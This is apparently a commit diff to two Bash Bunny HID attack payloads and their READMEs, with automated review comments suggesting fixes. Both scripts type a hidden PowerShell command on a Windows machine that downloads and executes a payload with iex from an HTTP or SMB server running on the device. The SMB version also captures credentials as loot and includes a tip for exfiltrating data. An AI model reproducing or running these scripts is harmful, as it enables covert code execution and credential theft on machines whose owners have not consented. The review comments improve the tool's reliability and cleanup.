cleaned up and extended
@@ -8,7 +8,8 @@
|
|||||||
# Attackmodes: HID, RNDIS_ETHERNET
|
# Attackmodes: HID, RNDIS_ETHERNET
|
||||||
# Firmware: >= 1.3
|
# Firmware: >= 1.3
|
||||||
#
|
#
|
||||||
# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
|
# Quick HID attack to retrieve and run powershell payload from BashBunny web server
|
||||||
|
# ensure p.txt (your powershell payload) exists in payload directory
|
||||||
#
|
#
|
||||||
# | Attack Stage | Description |
|
# | Attack Stage | Description |
|
||||||
# | ------------------- | ---------------------------------------- |
|
# | ------------------- | ---------------------------------------- |
|
||||||
@@ -18,41 +19,38 @@
|
|||||||
|
|
||||||
ATTACKMODE RNDIS_ETHERNET HID
|
ATTACKMODE RNDIS_ETHERNET HID
|
||||||
LED SETUP
|
LED SETUP
|
||||||
|
REQUIRETOOL gohttp
|
||||||
|
|
||||||
GET HOST_IP
|
GET HOST_IP
|
||||||
GET SWITCH_POSITION
|
GET SWITCH_POSITION
|
||||||
|
|
||||||
# Set working dir
|
# DEFINE DIRECTORIES
|
||||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
|
||||||
SERVER_LOG=$PAYLOAD_DIR/server.log
|
SERVER_LOG=/tmp/server.log
|
||||||
|
|
||||||
# Fresh Server Log
|
# SERVER LOG
|
||||||
rm -f $SERVER_LOG
|
rm -f ${SERVER_LOG}
|
||||||
|
|
||||||
# Check for gohttp
|
# START HTTP SERVER
|
||||||
REQUIRETOOL gohttp
|
|
||||||
|
|
||||||
# Start web server
|
|
||||||
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
|
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
|
||||||
/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR > $SERVER_LOG 2>&1 &
|
/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &
|
||||||
|
|
||||||
# Check for psh.txt
|
# CHECK FOR POWERSHELL
|
||||||
if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
|
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
|
||||||
LED FAIL2
|
LED FAIL2
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
|
cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp
|
||||||
|
|
||||||
# Attack HID
|
# STAGE 1 - POWERSHELL
|
||||||
LED STAGE1
|
LED STAGE1
|
||||||
|
|
||||||
# Attack (abbreviations to allow run execution)
|
RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
|
||||||
RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
|
|
||||||
# Remove tracks in the psh payload if you wish
|
# Remove tracks in the psh payload if you wish
|
||||||
|
|
||||||
# Attack Ethernet
|
# STAGE 2 - WAIT
|
||||||
LED STAGE2
|
LED STAGE2
|
||||||
|
while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do
|
||||||
while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do
|
|
||||||
sleep .5
|
sleep .5
|
||||||
done
|
done
|
||||||
|
|
||||||
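Review bot: The web server is started on `/tmp/` before the `p.txt` existence check and before the `cp -R ${PAYLOAD_DIR}/* /tmp/` that populates it, so on the `exit 1` path the backgrounded gohttp process and the DNS DROP rule are left behind, and while it runs it exposes everything in /tmp over HTTP, including `${SERVER_LOG}` itself and the copied `payload.txt`. Move the `if [ ! -f ... ]` block and the copy above the server start, serve a dedicated directory instead of `/tmp/` (e.g. `SERVE_DIR=$(mktemp -d)` with the log kept outside it), and quote the expansions: `rm -f "${SERVER_LOG}"`, `[ ! -f "${PAYLOAD_DIR}/p.txt" ]`, `grep -Fq 'GET "/DONE"' "${SERVER_LOG}"`. The comment `# Remove tracks in the psh payload if you wish` now sits under STAGE 1 with nothing following it; either move it next to the `RUN WIN` line or drop it. The `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule is never removed; a `# CLEANUP` step with `iptables -D OUTPUT -p udp --dport 53 -j DROP` after the STAGE 2 loop would restore the device's firewall state.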
|
|||||||
@@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve
|
|||||||
|
|
||||||
## Configuration
|
## Configuration
|
||||||
|
|
||||||
Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
||||||
|
|
||||||
## Requirements
|
## Requirements
|
||||||
|
|
||||||
|
|||||||
@@ -2,23 +2,23 @@
|
|||||||
#
|
#
|
||||||
# Title: Powershell Download and Execute SMB
|
# Title: Powershell Download and Execute SMB
|
||||||
# Author: LowValueTarget
|
# Author: LowValueTarget
|
||||||
# Version: 1.2
|
# Version: 2.0
|
||||||
# Category: Powershell
|
# Category: Powershell
|
||||||
# Target: Windows XP SP3+ (Powershell)
|
# Target: Windows XP SP3+ (Powershell)
|
||||||
# Attackmodes: HID, RNDIS_ETHERNET
|
# Attackmodes: HID, RNDIS_ETHERNET
|
||||||
# Firmware: >= 1.2
|
# Firmware: >= 1.2
|
||||||
#
|
#
|
||||||
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
|
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
|
||||||
# Ensure psh.txt exists in payload directory
|
# Credentials captured by are stored as loot.
|
||||||
|
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
|
||||||
#
|
#
|
||||||
# Requires Impacket is installed (python ./impacket/setup.py install)
|
# Required tools: impacket
|
||||||
#
|
#
|
||||||
# | Attack Stage | Description |
|
# | Attack Stage | Description |
|
||||||
# | ------------------- | ------------------------------|
|
# | ------------------- | ------------------------------|
|
||||||
# | Stage 1 | Powershell |
|
# | Stage 1 | Powershell |
|
||||||
# | Stage 2 | Delivering powershell payload |
|
# | Stage 2 | Delivering powershell payload |
|
||||||
#
|
#
|
||||||
|
|
||||||
ATTACKMODE RNDIS_ETHERNET HID
|
ATTACKMODE RNDIS_ETHERNET HID
|
||||||
|
|
||||||
# SETUP
|
# SETUP
|
||||||
@@ -29,48 +29,48 @@ GET SWITCH_POSITION
|
|||||||
GET TARGET_HOSTNAME
|
GET TARGET_HOSTNAME
|
||||||
GET HOST_IP
|
GET HOST_IP
|
||||||
|
|
||||||
|
# DEFINE DIRECTORIES
|
||||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||||
# Check for psh.txt
|
LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
|
||||||
if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then
|
|
||||||
|
mkdir -p /tmp/{l,p}
|
||||||
|
|
||||||
|
# CHECK FOR POWERSHELL
|
||||||
|
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
|
||||||
LED FAIL
|
LED FAIL
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
cp -R ${PAYLOAD_DIR}/* /tmp/
|
cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp
|
||||||
|
|
||||||
LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB
|
# GET HOSTNAME
|
||||||
# Setup named logs in loot directory
|
|
||||||
mkdir -p ${LOOTDIR}
|
|
||||||
HOST=${TARGET_HOSTNAME}
|
HOST=${TARGET_HOSTNAME}
|
||||||
# If hostname is blank set it to "noname"
|
[[ -z "${HOST}" ]] && HOST="noname"
|
||||||
[[ -z "$HOST" ]] && HOST="noname"
|
COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
|
||||||
COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l)
|
|
||||||
COUNT=$((COUNT+1))
|
COUNT=$((COUNT+1))
|
||||||
mkdir -p ${LOOTDIR}/${HOST}-$COUNT
|
mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
|
||||||
|
LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}
|
||||||
|
|
||||||
# Log file
|
# START SMB SERVER
|
||||||
LOGFILE=psh_smb.log
|
LOGFILE=/tmp/l/psh_downloadsmb.log
|
||||||
|
touch ${LOGFILE}
|
||||||
|
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &
|
||||||
|
|
||||||
# Start SMB Server
|
# STAGE 1 - POWERSHELL
|
||||||
mkdir -p /loot
|
|
||||||
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
|
|
||||||
|
|
||||||
# STAGE 1 - Powershell
|
|
||||||
LED STAGE1
|
LED STAGE1
|
||||||
|
RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
|
||||||
|
# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
|
||||||
|
# TIP: Remove tracks in the psh payload if you wish
|
||||||
|
|
||||||
RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
|
# STAGE 2 - HURRY UP AND WAIT
|
||||||
# Remove tracks in the psh payload if you wish
|
|
||||||
|
|
||||||
# STAGE 2 - Wait until payload retrieved
|
|
||||||
# Wait until payload is retrieved
|
|
||||||
LED STAGE2
|
LED STAGE2
|
||||||
while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
|
while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
|
||||||
|
|
||||||
# CLEANUP
|
# CLEANUP
|
||||||
LED CLEANUP
|
LED CLEANUP
|
||||||
|
|
||||||
# Move loot to mass storage
|
# STASH THE LOOT
|
||||||
mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
|
mv /tmp/l/* ${LOOTDIR_BB}/
|
||||||
rm /loot/${LOGFILE}
|
rm -rf /tmp/{l,p}
|
||||||
# Sync file system
|
# Sync file system
|
||||||
sync
|
sync
|
||||||
|
|
||||||
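Review bot: `HOST` is taken from `TARGET_HOSTNAME`, a value supplied by the connected machine, and is expanded unquoted into the glob `ls -lad ${LOOTDIR_BB}/${HOST}*` and into `mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}`, so whitespace or glob characters in the hostname change which paths are counted and created; restrict it to a safe character set and quote it, e.g. `HOST=${TARGET_HOSTNAME//[^A-Za-z0-9._-]/_}` before the `[[ -z "${HOST}" ]] && HOST="noname"` line, and derive `COUNT` from a quoted glob loop or `find` rather than parsing `ls`. The `# CLEANUP` block removes `/tmp/l` and `/tmp/p` but not `/tmp/COMPLETE`, which the STAGE 2 loop polls, and the backgrounded `smbserver.py` is never stopped; capture its PID with `SMB_PID=$!` on the line after the server start and add `kill "${SMB_PID}"` and `rm -f /tmp/COMPLETE` under `# CLEANUP` before `sync`. `mv /tmp/l/* ${LOOTDIR_BB}/` should also quote the destination, `mv /tmp/l/* "${LOOTDIR_BB}/"`, since it contains the sanitized hostname. The script's earlier setup (`GET SWITCH_POSITION` and the lines above it) is outside this hunk.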
|
|||||||
@@ -10,12 +10,16 @@
|
|||||||
|
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
|
Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot.
|
||||||
|
|
||||||
## Configuration
|
## Configuration
|
||||||
|
|
||||||
* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
||||||
* Requires Impacket is installed (python ./impacket/setup.py install)
|
* Requires Impacket
|
||||||
|
|
||||||
|
__Installation__
|
||||||
|
|
||||||
|
See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/
|
||||||
|
|
||||||
## STATUS
|
## STATUS
|
||||||
|
|
||||||
|
|||||||